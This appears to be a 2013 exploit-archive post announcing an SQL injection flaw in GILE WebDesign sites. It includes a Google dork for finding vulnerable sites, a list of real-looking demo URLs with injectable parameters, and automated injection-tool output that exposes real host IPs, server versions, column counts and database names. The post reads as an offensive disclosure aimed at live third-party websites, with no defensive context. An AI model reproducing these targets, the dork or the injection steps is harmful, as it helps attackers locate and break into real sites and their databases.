GILE WebDesign SQL Injection Vulnerability

Posted on 30 November 2013
X-------------------------------------------------------------X
 _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________
|_   _| | | |  | |_   _/  ___|_   _|/ _  |  | | /  __   / / ___   ___| ___ 
  | | | | | |  | | | |  `--.  | | / /_ |  | | | /  / V /| |_/ / |__ | |_/ /
  | | | | | | . ` | | |  `--.  | | |  _  || . ` | | |      / | ___   __||    /
  | | | |_| | |  |_| |_/\__/ /_| |_| | | || |  | | \__/ | | | |_/ / |___| | 
  \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X                                                                                 
  
  
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  GILE WebDesign SQL Injection Vulnerability
[+] Date: 29-11-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04
  
  
###############################################

Demos:
http://www.lufaXda.com.tw/product_list.php?CateId=1'
http://www.yafXod.com.tw/prodcate.php?CateId=3'
http://www.pXr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.giXe.com.tw/work_list.php?Cate=2'
 
Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767
 
 
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643
 
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: &#227;&#8364;&#338;&#229;Â°&#229;°&#188;&#230;&#8211;&#8225;&#229;&#338;&#8211;ç&#175;&#8364;-&#230;&#732;&#376;&#229;&#8230;&#8240;é&#8211;&#402;&#232;&#8364;&#8364;&#227;&#8364;®&#229;Â°&#227;&#8364;Â&#230;&#8211;°&#229;&#185;´&#227;&#8364;Â&#230;´&#187;&#229;&#8249;&#8226;
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr
 
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k
 
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile
 
#############################################
TOP
Malware :

Last 20
Exploits :

Last 20